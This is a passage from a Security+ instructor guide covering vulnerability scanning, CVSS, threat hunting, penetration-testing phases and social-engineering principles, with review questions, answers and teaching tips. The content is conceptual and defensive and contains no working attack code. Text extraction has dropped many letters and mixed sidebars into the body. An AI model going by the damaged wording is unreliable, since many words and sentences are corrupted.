The CVE dictionary provides the principal input for NIST's National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric, calculated using the Common ulnera ilit corin
stem C , plus fi information.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 60 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

CVSS is maintained by the Forum of Incident Response and Security Teams

(first.org cvss). CVSS metrics generate a score from 0 to 10 based on characteristics
of the vulnerability, such as whether it can be triggered remotely or needs local
access, whether user intervention is required, and so on. The scores are banded into
descriptions too:

core escription
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical

ho lide s Intrusi e ersus on Intrusi e cannin

Intrusive versus Non-
A network vulnerability scanner can be implemented purely as software or as a security
Intrusive Scanning appliance, connected to the network. Some scanners work remotely by contacting
the target host over the network. Other scanner types use agents installed locally on
Teaching each host to perform the scanning and transmit a report to a management server. For
Tip example, Nessus Professional allows remote scanning of hosts while Nessus Manager,
Ensure students can and Tenable Cloud can work with locally installed agent software.
distinguish these
scanning techniques
and identify
drawbacks, such as
time to complete,
inaccurate results, and
risk of system crash.

essus anager web management interface.

(Screenshot used with permission from Tenable etwork Security.)

Scan intrusiveness is a measure of how much the scanner interacts with the target.
on intrusi e or passi e scannin means analyzing indirect evidence, such as the
types of traffic generated by a device. A passive scanner, the eek Network ecurity
Monitor (zeek.org) being one example, analyzes a network capture and tries to identify
policy deviations or CVE matches. This type of scanning has the least impact on the
network and on hosts, but is less likely to identify vulnerabilities comprehensively.
Passive scanning might be used by a threat actor to scan a network stealthily. You might
use passive scanning as a technique where active scanning poses a serious risk to system
stability, such as scanning print devices, VoIP handsets, or embedded systems networks.
Active scanning means probing the device's configuration using some sort of network
connection with the target. Active scanning consumes more network bandwidth and
runs the risk of crashing the target of the scan or causing some other sort of outage.
Agent-based scanning is also an active technique.
The most intrusive type of vulnerability scanner does not stop at detecting a
vulnerability. Exploitation frameworks contain default scripts to try to use a
vulnerability to run code or otherwise gain access to the system. This type of highly
intrusive testing is more typical of penetration testing than automated vulnerability
scanning.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 61

Credentialed ersus on Credentialed cannin ho lide s

A non-credentialed scan is one that proceeds by directing test packets at a host Credentialed versus
without being able to log on to the OS or application. The view obtained is the one Non-Credentialed
that the host exposes to an unprivileged user on the network. The test routines may Scanning
be able to include things such as using default passwords for service accounts and
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn't have specific high level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with log-on rights to various hosts,
plus whatever other permissions are appropriate for the testing routines. This
sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured. It also shows what an
insider attack, or one where the attacker has compromised a user account, may
be able to achieve. A credentialed scan is a more intrusive type of scan than
non-credentialed scanning.

Configuring credentials for use in target (scope) definitions in Greenbone Open AS as installed on ali
inux. (Screenshot used with permission from Greenbone etworks, http www.openvas.org.)

Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the
credentials for these accounts are stored securely on the scan server.
ho lide s

False Positives, False

Negatives, and Log
alse ositi es alse e ati es and o e ie Review

A scanning tool will generate a summary report of all vulnerabilities discovered during Teaching
the scan directly after execution completes. These reports color-code vulnerabilities Tip
in terms of their criticality, with red typically denoting a weakness that requires
Students need to
immediate attention. You can usually view vulnerabilities by scope (most critical across know the meanings of
all hosts or by host. The report should include or link to specific details about each false positive and false
vulnerability and how hosts can be remediated. negative.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 62 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Scan report listing multiple high-severity vulnerabilities found in a indows host. (Screenshot
Greenbone Community Edition greenbone.net en community-edition.)

Intrusive/active scanning is more likely to detect a wider range of vulnerabilities in host

systems and can reduce false positives. A false positive is something that is identified
by a scanner or other assessment tool as being a vulnerability, when in fact it is not.
or e ample, assume that a vulnerability scan identifies an open port on the firewall.
Because a certain brand of malware has been known to use this port, the tool labels
this as a security risk, and recommends that you close the port. However, the port is
not open on your system. esearching the issue costs time and e ort, and if e cessive
false positives are thrown by a vulnerability scan, it is easy to disregard the scans
entirely, which could lead to larger problems.
You should also be alert to the possibility of false negatives–that is, potential
vulnerabilities that are not identified in a scan. This risk can be mitigated somewhat by
running repeat scans periodically and by using scanners from more than one vendor.
Also, because automated scan plug-ins depend on pre-compiled scripts, they do not
reproduce the success that a skilled and determined hacker might be capable of and
can therefore create a false sense of security.
Reviewing related system and network logs can enhance the vulnerability report
validation process. As an e ample, assume that your vulnerability scanner identified a
running process on a Windows machine. According to the scanner, the application that
creates this process is known to be unstable, causing the operating system to lock up
and crash other processes and services. When you search the computer's event logs,
you notice several entries over the past couple of weeks indicate the process has failed.
Additional entries show that a few other processes fail right after. In this instance,
you've used a relevant data source to help confirm that the vulnerability alert is, in
fact, valid.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 63

Confi uration e ie ho lide s

As well as matching known software exploits to the versions of software found running Configuration eview
on a network, a vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks. It might
try to identify whether there is a lack of controls that might be considered necessary or
whether there is any misconfiguration of the system that would make the controls less
e ective or ine ective, such as anti virus software not being updated, or management
passwords left configured to the default. enerally speaking, this sort of testing
re uires a credentialed scan. It also re uires specific information about best practices
in configuring the particular application or security control. These are provided by
listing the controls and appropriate configuration settings in a template.
Security content automation protocol (SCAP) allows compatible scanners to determine
whether a computer meets a configuration baseline. CA uses several components to
accomplish this function, but some of the most important are:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema for
describing system security state and querying vulnerability reports and information.

• tensible Configuration Checklist Description ormat CCD an ML schema for

developing and auditing best practice configuration checklists and rules. reviously,
best-practice guides might have been written in prose for system administrators to
apply manually. XCCDF provides a machine-readable format that can be applied and
validated using compatible software.

Comparing a local network security policy to a template. The minimum password length set
in the local policy is much less than is recommended in the template.
(Screenshot used with permission from icrosoft.)

ome scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary for
regulatory compliance or you might voluntarily want to conform to externally agreed
standards of best practice.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 64 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Scan templates supporting compliance scans in essus anager.

(Screenshot used with permission from Tenable etwork Security.)

ho lide s Threat untin

Threat Hunting
here vulnerability scanning uses lists of patches and standard definitions of baseline
configurations, threat hunting is an assessment technique that utilizes insights
Teaching gained from threat intelligence to proactively discover whether there is evidence of
Tip TTPs already present within the network or system. This contrasts with a reactive
Threat hunting is a
process that is only triggered when alert conditions are reported through an incident
new addition to the management system. You can also contrast threat hunting with penetration testing.
syllabus. Explain how Where a pen test attempts to achieve some sort of system intrusion or concrete
its role compares to demonstration of weakness, threat hunting is based only on analysis of data within the
vulnerability scanning system. To that extent, it is less potentially disruptive than pen testing.
and penetration
testing. A threat hunting project is likely to be led by senior security analysts, but some general
points to observe include:
• Advisories and bulletins—threat hunting is a labor-intensive activity and so needs
to be performed with clear goals and resources. Threat hunting usually proceeds
according to some hypothesis of possible threat. Security bulletins and advisories
from vendors and security researchers about new TTPs and/or vulnerabilities may
be the trigger for establishing a threat hunt. For example, if threat intelligence
reveals that Windows desktops in many companies are being infected with a new
type of malware that is not being blocked by any current malware definitions, you
might initiate the following threat-hunting plan to detect whether the malware is
also infecting your systems.

• Intelli ence usion and threat data—threat hunting can be performed by manual
analysis of network and log data, but this is a very lengthy process. An organization
with a security information and event management (SIEM) and threat analytics
platform can apply intelligence fusion techniques. The analytics platform is kept up
to date with a TT and IoC threat data feed. Analysts can develop ueries and filters

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 65

to correlate threat data against on premises data from network traffic and logs. This
process may also be partially or wholly automated using AI-assisted analysis and
correlation.

• aneu er—when investigating a suspected live threat, you must remember the
adversarial nature of hacking. A capable threat actor is likely to have anticipated
the likelihood of threat hunting, and attempted to deploy countermeasures
to frustrate detection. For example, the attacker may trigger a DDoS attack to
divert the security team's attention, and then attempt to accelerate plans to
achieve actions on objectives. Maneuver is a military doctrine term relating to
obtaining positional advantage (ccdcoe.org/uploads/2012/01/3_3_Applegate_
ThePrincipleOfManeuverInCyberOperations.pdf). As an example of defensive
maneuver, threat hunting might use passive discovery techniques so that threat
actors are given no hint that an intrusion has been discovered before the security
team has a containment, eradication, and recovery plan.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 66 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Vulnerability Scanning Techniques
Answer the following questions:

1. ou ha e recei ed an ur ent threat ad isor and need to confi ure a

net or ulnera ilit scan to chec or the presence o a related C
on our net or hat confi uration chec should ou ma e in the
ulnera ilit scannin so t are e ore runnin the scan

erify that the vulnerability feed plug in test has been updated with the specific C
that you need to test for.

2. ou ha e confi ured a net or ulnera ilit scanner or an en ineerin

compan hen runnin a scan multiple sensors ithin an em edded
s stems net or ecame unresponsi e causin a production shutdo n
hat alternati e method o ulnera ilit scannin should e used or the
em edded s stems net or

A fully non intrusive solution should be adopted, such as sniffing traffic using a
network tap or mirror port. sing the network traffic to detect vulnerabilities rather
than actively probing each device will not cause system stability issues (though there is
greater risk of false positive and false negative results).

3. A ulnera ilit scan reports that a C associated ith Cent inu is

present on a host ut ou ha e esta lished that the host is not runnin
Cent hat t pe o scannin error e ent is this

False positive.

4. A small compan that ou pro ide securit consultin support to has

resisted in estin in an e ent mana ement and threat intelli ence
plat orm The C has ecome concerned a out an A T ris no n to
tar et suppl chains ithin the compan s industr sector and ants ou
to scan their s stems or an si n that the ha e een tar eted alread
hat are the additional challen es o meetin this re uest i en the lac o
in estment

Collecting network traffic and log data from multiple sources and then analy ing
it manually will require many hours of analyst time. The use of threat feeds and
intelligence fusion to automate parts of this analysis e ort would enable a much
swifter response.

5. hat term relates to assessment techni ues that a oid alertin threat
actors

This can be referred to as maneuver.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 67

Topic 3D
Explain Penetration Testing Concepts

EXAM OBJECTIVES COVERED Teaching

1. Explain the techni ues used in penetration testing Tip
As this is an explain-
level objective,
students only need
Automated vulnerability scanning does not test what a highly capable threat actor
an overview of
might be able to achieve. Penetration testing is a type of assessment that adopts penetration testing,
known tactics and techniques to attempt intrusions. Devising, planning, and leading and not detailed
penetration tests is a specialized security role, but at a junior level you are likely practical procedures.
to participate in this type of engagement, so you should be able to explain the
fundamental principles.

enetration Testin ho lide s

A penetration test—often shortened to pen test—uses authorized hacking techniques Penetration Testing
to discover exploitable weaknesses in the target's security systems. Pen testing is also
referred to as ethical hacking. A pen test might involve the following steps: Teaching
Tip
• Verify a threat exists—use surveillance, social engineering, network scanners, and
vulnerability assessment tools to identify a vector by which vulnerabilities that could Make sure students
can distinguish
be exploited.
vulnerability
assessment from pen
• Bypass security controls—look for easy ways to attack the system. For example, if
testing.
the network is strongly protected by a firewall, is it possible to gain physical access
to a computer in the building and run malware from a USB stick?

• Actively test security controls probe controls for configuration weaknesses and
errors, such as weak passwords or software vulnerabilities.

• Exploit vulnerabilities—prove that a vulnerability is high risk by exploiting it to gain

access to data or install backdoors.

The key di erence from passive vulnerability assessment is that an attempt is made
to actively test security controls and exploit any vulnerabilities discovered. Pen testing
is an intrusive assessment technique. For example, a vulnerability scan may reveal
that an SQL Server has not been patched to safeguard against a known exploit. A
penetration test would attempt to use the exploit to perform code injection and
compromise and "own" (or "pwn" in hacker idiom) the server. This provides active
testing of security controls. Even though the potential for the exploit exists, in practice
the permissions on the server might prevent an attacker from using it. This would not
be identified by a vulnerability scan, but should be proven or not proven to be the case
by penetration testing.

ules o n a ement ho lide s

Security assessments might be performed by employees or may be contracted to ules of ngagement

consultants or other third parties. ules o en a ement specify what activity is
permitted or not permitted. These rules should be made explicit in a contractual
agreement. For example, a pen test should have a concrete objective and scope rather

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 68 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Teaching than a vague type of "Break into the network" aim. There may be systems and data
Tip that the penetration tester should not attempt to access or exploit. Where a pen test
Make sure students involves third-party services (such as a cloud provider), authorization to conduct the
can distinguish test must also be sought from the third party.
between black box,
white box, and gray The Pentest-Standard website provides invaluable commentary on the conduct of pen tests
box. (pentest-standard.readthedocs.io en latest tree.html).

Attac rofile
Attacks come from di erent sources and motivations. ou may wish to test both
resistance to external (targeted and untargeted) and insider threats. You need to
determine how much information about the network to provide to the consultant:
• lac o (or unknown environment)—the consultant is given no privileged
information about the network and its security systems. This type of test would
require the tester to perform a reconnaissance phase. Black box tests are useful for
simulating the behavior of an external threat.

• hite o (or known environment)—the consultant is given complete access to

information about the network. This type of test is sometimes conducted as a
follow up to a black bo test to fully evaluate aws discovered during the black bo
test. The tester skips the reconnaissance phase in this type of test. White box tests
are useful for simulating the behavior of a privileged insider threat.

• ra o (or partially known environment)—the consultant is given some

information; typically, this would resemble the knowledge of junior or non-IT
sta to model particular types of insider threats. This type of test re uires partial
reconnaissance on the part of the tester. Gray box tests are useful for simulating
the behavior of an unprivileged insider threat.

A test where the attacker has no knowledge of the system but where sta are informed
that a test will take place is referred to as a blind (or single-blind test. A test where sta
are not made aware that a pen test will take place is referred to as a double-blind test.

u ount
ho lide s
A u ount is a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities. Where a pen test is performed on a
Exercise Types contractual basis, costed by the consultant, a bug bounty program is a way of crowd
sourcing detection of vulnerabilities. Some bug bounties are operated as internal
Teaching programs, with rewards for employees only. Most are open to public submissions
Tip (tripwire.com/state-of-security/security-data-protection/cyber-security/essential-bug-
Note that purple is not bounty-programs).
necessarily a separate
team (possibly one
or more facilitators), ercise T pes
but a di erent way
of structuring the Some of the techniques used in penetration testing may also be employed as an
exercise. exercise between two competing teams:
You might want
to note the use of • ed team performs the o ensive role to try to infiltrate the target.
"rainbow" teams
to include DevOps • lue team—performs the defensive role by operating monitoring and alerting
(blackhat.com/docs/ controls to detect and prevent the infiltration.
us-17/wednesday/
us-17-Wright-Orange- There will also often be a white team, which sets the rules of engagement and
Is-The-New-Purple-wp. monitors the exercise, providing arbitration and guidance, if necessary. If the red team
pdf). is third party, the white team will include a representative of the consultancy company.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 69

One critical task of the white team is to halt the exercise should it become too risky. For
example, an actual threat actor may attempt to piggyback a backdoor established by
the red team.
In a red versus blue team exercise, the typical process is for the red team to attempt
the intrusion and either succeed or fail, and then to write a summary report. This
confrontational structure does not always promote constructive development and
improvement. In a purple team exercise, the red and blue teams meet for regular
debriefs while the exercise is ongoing. The red team might reveal where they have been
successful and collaborate with the blue team on working out a detection mechanism.
This process might be assisted by purple team members acting as facilitators. The
drawback of a purple team exercise is that without blind or double-blind conditions,
there is no simulation of a hostile adversary and the stresses of dealing with that.

assi e and Acti e econnaissance ho lide s

Analysis of adversary TTPs has established various "kill chain" models of the way Passive and Active
modern cyber-attacks are conducted. A penetration testing engagement will generally Reconnaissance
use the same sort of techniques.
Teaching
In the first reconnaissance phase for black bo testing, the pen tester establishes a
Tip
profile of the target of investigation and surveys the attack surface for weaknesses.
Reconnaissance activities can be classed as passive or active. Passive reconnaissance is Make sure students
understand the
not likely to alert the target of the investigation as it means querying publicly available
terminology and
information. Active reconnaissance has more risk of detection. Active techniques might can distinguish
involve gaining physical access to premises or using scanning tools on the target's web passive from active
services and other networks. techniques.

• Open Source Intelligence (OSINT)—using web search tools, social media, and
sites that scan for vulnerabilities in Internet-connected devices and services
(securitytrails.com/blog/osint-tools) to obtain information about the target. OSINT
aggregation tools, such as theHarvester (github.com/laramies/theHarvester), collect
and organize this data from multiple sources. OSINT requires almost no privileged
access as it relies on finding information that the company makes publicly available,
whether intentionally or not. This is a passive technique.

• ocial en ineerin —this refers to obtaining information, physical access to

premises, or even access to a user account through the art of persuasion. While the
amount of interaction may vary, this can be classed as an active technique.

• ootprintin —using software tools, such as Nmap (nmap.org), to obtain

information about a host or network topology. Scans may be launched against
web hosts or against wired or wireless network segments, if the attacker can gain
physical access to them. While passive footprinting is possible (by limiting it to
pac et sni n ), most scan techniques require active network connections with the
target that can be picked up by detection software.

• ar dri in —mapping the location and type (frequency channel and security
method) of wireless networks operated by the target. Some of these networks may
be accessible from outside the building. imply sniffing the presence of wireless
networks is a passive activity, though there is the risk of being observed by security
guards or cameras. An attacker might be able to position rogue access points, such
as the Hak5 Pineapple (shop.hak .org products wifi pineapple), or perform other
wireless attacks using intelligence gathered from war driving.

• rones unmanned aerial ehicle A —allow the tester to reconnoiter campus

premises, and even to perform war driving from the air war ying . A tool such as the
Wi-Fi Pineapple can easily be incorporated on a drone (hackaday.com/2018/05/27/
watch dogs inspired hacking drone takes ight). Drones also provide a vector for
one enduringly popular social engineering technique; dropping infected USB media

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 70 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

around premises, with the expectation that at least some of them will be picked up
and used (blackhat.com/docs/us-16/materials/us-16-Bursztein-Does-Dropping-USB-
Drives-In-Parking-Lots-And-Other-Places-Really-Work.pdf .

ho lide s en Test Attac i e C cle

Pen Test Attack Life
In the kill chain attack life cycle, reconnaissance is followed by an initial exploitation
Cycle phase where a software tool is used to gain some sort of access to the target's
network. This foothold might be accomplished using a phishing email and payload or
Teaching by obtaining credentials via social engineering. Having gained the foothold, the pen
Tip tester can then set about securing and widening access. A number of techniques are
Make sure students required:
can use this
• ersistence—the tester's ability to reconnect to the compromised host and use
terminology.
it as a remote access tool (RAT) or backdoor. To do this, the tester must establish
a command and control (C2 or C&C) network to use to control the compromised
host, upload additional attack tools, and download e filtrated data. The connection
to the compromised host will typically require a malware executable to run after
shut down log o events and a connection to a network port and the attacker's I
address to be available.

• Privilege escalation—persistence is followed by further reconnaissance, where

the pen tester attempts to map out the internal network and discover the services
running on it and accounts configured to access it. Moving within the network or
accessing data assets are likely to require higher privilege levels. For example,
the original malware may have run with local administrator privileges on a client
workstation or as the Apache user on a web server. Another exploit might allow
malware to execute with system/root privileges, or to use network administrator
privileges on other hosts, such as application servers.

• ateral mo ement—gaining control over other hosts. This is done partly to

discover more opportunities to widen access (harvesting credentials, detecting
software vulnerabilities, and gathering other such "loot"), partly to identify where
valuable data assets might be located, and partly to evade detection. Lateral
movement usually involves executing the attack tools over remote process shares
or using scripting tools, such as PowerShell.

• Pivoting—hosts that hold the most valuable data are not normally able to access
external networks directly. If the pen tester achieves a foothold on a perimeter
server, a pivot allows them to bypass a network boundary and compromise servers
on an inside network. A pivot is normally accomplished using remote access and
tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or
remote desktop.

• Actions on Objectives—for a threat actor, this means stealing data from one or
more systems data e filtration . rom the perspective of a pen tester, it would be a
matter of the scope definition whether this would be attempted. In most cases, it is
usually sufficient to show that actions on ob ectives could be achieved.

• Cleanup—for a threat actor, this means removing evidence of the attack, or at least
evidence that could implicate the threat actor. For a pen tester, this phase means
removing any backdoors or tools and ensuring that the system is not less secure
than the pre-engagement state.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 71

Review Activity:
Penetration Testing Concepts
Answer the following questions:

1. A e site o ner ants to e aluate hether the site securit miti ates ris s
rom criminal s ndicates assumin no ris o insider threat hat t pe o
penetration testin en a ement ill most closel simulate this ad ersar
capa ilit and resources

An threat actor has no privileged information about the website configuration or

security controls. This is simulated in a black box (or blind) pen test engagement.

2. ou are a reein a proposal to run a series o team ased e ercises to test

securit controls under di erent scenarios ou propose usin purple team
testin ut the contractin compan is onl amiliar ith the concept o red
and lue teams hat is the ad anta e o runnin a purple team e ercise

In a red versus blue team, there is no contact between the teams, and no opportunity
to collaborate on improving security controls. In a purple team exercise, there is
regular contact and knowledge sharing between the teams throughout the progression
of the exercise.

3. h should an Internet ser ice pro ider I e in ormed e ore pen

testin on a hosted e site ta es place

I s monitor their networks for suspicious traffic and may block the test attempts. The
pen test may also involve equipment owned and operated by the ISP.

4. hat tools are used or I T

Open-source intelligence is a reconnaissance activity to gather information about the

target from any public source. The basic tool is web searches/queries plus sites that
scan/scrape/monitor vulnerabilities in Internet-facing services and devices. There are
also specialist OSINT tools, such as theHarvester, that aggregate data from queries for
di erent resources.

5. In the conte t o penetration testin hat is persistence

Persistence refers to the tester's ability to reconnect to the compromised host and use
it as a remote access tool (RAT) or backdoor.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 72 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 3
Summary
Teaching You should be able to summarize types of security assessments, such as vulnerability,
Tip threat hunting, and penetration testing. You should also be able to explain general
Check that students procedures for conducting these assessments.
are confident about
the content that has
been covered. If there
uidelines or er ormin ecurit Assessments
is time, revisit any
content examples that
Follow these guidelines when you consider the use of security assessments:
they have questions • Identify the procedures and tools that are required to scan the attack surface for
about. If you have
vulnerabilities. This might mean provisioning passive network scanners, active
used all the available
time for this lesson remote or agent-based network scanners, and application or web application
block, note the issues, scanners.
and schedule time for
a review later in the • Develop a configuration and maintenance plan to ensure secure use of any
course. credentialed scans and updates to vulnerability feeds.

Interaction • Run scans regularly and review the results to identify false positives and false
pportunit negatives, using log review and additional CVE information to validate results if
Optionally, discuss necessary.
with students which
security assessments • chedule configuration reviews and remediation plans, using C vulnerability
they have used in their criticality to prioritize actions.
workplaces, or which
could be of most • Consider implementing threat hunting programs, monitoring advisories and
benefit. bulletins for new threat sources. Note that threat hunting might require investment
in resources to supply intelligence fusion and threat data.

• Consider implementing penetration testing exercises, ensuring that these are set
up with clear rules of engagement for red/blue or purple team exercise types and
black/white/gray box disclosure.

• Run penetration tests using a structured kill chain life cycle, with reconnaissance,
exploitation, persistence, privilege escalation, lateral movement/pivoting, actions on
objectives, and cleanup phases.

esson Performing Security Assessments

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 4
Identifying Social
Engineering and Malware

LESSON INTRODUCTION Teaching

Tip
It is not sufficient for security assessments to focus solely on software vulnerabilities This lesson concludes
and configuration errors. As well as these hardware and software systems, the the assess phase
attack surface contains a company's employees and the degree to which they can of the course by
be e ploited to gain unauthori ed access or privileges. Threat actors use social looking at the
engineering techni ues to elicit information, obtain access to premises, and to trick mechanisms used to
e ect an intrusion
users into running malicious code. ou must understand these attacks and train
and identifying social
your colleagues and customers with the ability to detect and report them. As well as engineering and
being able to e plain these techni ues, you must be able to describe the indicators malware TT s and
associated with di erent types of malware and analy e your systems for possible indicators.
infections.

Lesson Objectives
In this lesson, you will
• Compare and contrast social engineering techni ues.

• Analy e indicators of malware based attacks.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 74 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
ocial engineering is
established as a topic
at A level, so students
should be familiar with
the basics. ocus on
principles, the more
specific techni ues,
and the new additions
for this syllabus
version.
Show Slide(s)
ocial ngineering
Teaching
Tip
Note that social
engineering
includes written
communication as
well as face to face
interaction.
ou can refer students
to evin Mitnick s
books mitnicksecurity.
com and ruce
chneier's website
schneier.com essays
social .
Show Slide(s)
ocial ngineering
rinciples
Interaction
Opportunity
Ask whether any
students have
been sub ected to
social engineering
attempts and what the
e perience was like.
esson Identifying Social Engineering and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Topic 4A
Compare and Contrast Social
Engineering Techniques
EXAM OBJECTIVES COVERED
1.1 Compare and contrast different types of social engineering techni ues
eople employees, contractors, suppliers, and customers represent part of the
attack surface of any organi ation. A person with permissions on the system is a
potential target of social engineering. eing able to compare and contrast social
engineering techni ues will help you to lead security awareness training and to develop
policies and other security controls to mitigate these risks.
Social Engineering
Adversaries can use a diverse range of techni ues to compromise a security system.
A prere uisite of many types of attacks is to obtain information about the network
and security system. ocial engineering refers to means of either eliciting information
from someone or getting them to perform some action for the threat actor. It can also
be referred to as hacking the human. ocial engineering might be used to gather
intelligence as reconnaissance in preparation for an intrusion, or it might be used to
e ect an actual intrusion. Typical social engineering intrusion scenarios include
• An attacker creates an e ecutable file that prompts a network user for their
password, and then records whatever the user inputs. The attacker then emails
the e ecutable file to the user with the story that the user must double click the file
and log on to the network again to clear up some logon problems the organi ation
has been e periencing that morning. After the user complies, the attacker now has
access to their network credentials.
• An attacker contacts the help desk pretending to be a remote sales representative
who needs assistance setting up remote access. Through a series of phone calls,
the attacker obtains the name address of the remote access server and login
credentials, in addition to phone numbers for remote access and for accessing the
organi ation's private phone and voice mail system.
• An attacker triggers a fire alarm and then slips into the building during the
confusion and attaches a monitoring device to a network port.
Social Engineering Principles
ocial engineering is one of the most common and successful malicious techni ues.
ecause it e ploits basic human trust, social engineering has proven to be a particularly
e ective way of manipulating people into performing actions that they might not
otherwise perform. To be persuasive, social engineering attacks rely on one or more of
the following principles.
alware | Topic A
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 75

Familiarity/Liking
ome people have the sort of natural charisma that allows them to persuade others
to do as they re uest. ne of the basic tools of a social engineer is simply to be a able
and likable, and to present the re uests they make as completely reasonable and
unob ectionable. This approach is relatively low risk as even if the re uest is refused,
it is less likely to cause suspicion and the social engineer may be able to move on to a
di erent target without being detected.

Consensus/Social Proof
The principle of consensus or social proof refers to the fact that without an e plicit
instruction to behave in a certain way, many people will act ust as they think others
would act. A social engineering attack can use this instinct either to persuade the
target that to refuse a re uest would be odd That's not something anyone else has
ever said no to or to e ploit polite behavior to slip into a building while someone
holds the door for them. As another e ample, an attacker may be able to fool a user
into believing that a malicious website is actually legitimate by posting numerous fake
reviews and testimonials praising the site. The victim, believing many di erent people
have udged the site acceptable, takes this as evidence of the site's legitimacy and
places their trust in it.

Authority and Intimidation

Many people find it difficult to refuse a re uest by someone they perceive as superior
in rank or e pertise. ocial engineers can try to e ploit this behavior to intimidate
their target by pretending to be a senior e ecutive. An attack might be launched by
impersonating someone who would often be deferred to, such as a police officer,
udge, or doctor. Another techni ue is using spurious technical arguments and argon.
ocial engineering can e ploit the fact that few people are willing to admit ignorance.
Compared to using a familiarity liking sort of approach, this sort of adversarial tactic
might be riskier to the attacker as there is a greater chance of arousing suspicion and
the target reporting the attack attempt.

Scarcity and Urgency

ften also deployed by salespeople, creating a false sense of scarcity or urgency can
disturb people's ordinary decision making process. The social engineer can try to
pressure his or her target by demanding a uick response. or e ample, the social
engineer might try to get the target to sign up for a limited time or invitation only
trial and re uest a username and password for the service hoping that the target
will o er a password he or she has used for other accounts . ake anti virus products
generate a sense of urgency by trying to trick users into thinking that their computer is
already infected with malware.

Impersonation and Trust Show Slide(s)

Impersonation simply means pretending to be someone else. It is one of the basic Impersonation and
social engineering techni ues. Impersonation can use either a consensus liking or Trust
intimidating approach. Impersonation is possible where the target cannot verify the
attacker's identity easily, such as over the phone or via an email message.
The classic impersonation attack is for the social engineer to phone into a department,
claim they have to ad ust something on the user's system remotely, and get the user to
reveal their password. This specific attack is also referred to as pretexting.

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 76 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

o you really know who s on the other end of the line

Making a convincing impersonation and establishing a trust with the target usually
depends on the attacker obtaining privileged information about the organi ation.
or e ample, where the attacker impersonates a member of the organi ation's IT
support team, the attack will be more e ective with identity details of the person being
impersonated and the target.
ome social engineering techni ues are dedicated to obtaining this type of intelligence
as a reconnaissance activity. As most companies are set up toward customer service
rather than security, this information is typically uite easy to come by. Information
that might seem innocuous such as department employee lists, ob titles, phone
numbers, diaries, invoices, or purchase orders can help an attacker penetrate an
organi ation through impersonation.

Show Slide(s) Dumpster Diving and Tailgating

Dumpster Diving and
ocial engineering includes physical attacks to steal information or gain access.
Tailgating
Dumpster Diving
Teaching
Tip
Dumpster diving refers to combing through an organi ation's or individual's garbage
to try to find useful documents or even files stored on discarded removable media .
It's also worth noting
the risks of social
networking sites and emember that attacks may be staged over a long period. Initial attacks may only aim at
how much II can compromising low-level information and user accounts, but this low-level information can
be e posed through be used to attack more sensitive and confidential data and better protected management
profiles on acebook, and administrative accounts.
et al.

Tailgating and Piggy Backing

Tailgating is a means of entering a secure area without authori ation by following
close behind the person that has been allowed to open the door or checkpoint. Piggy
backing is a similar situation, but means that the attacker enters a secure area with an
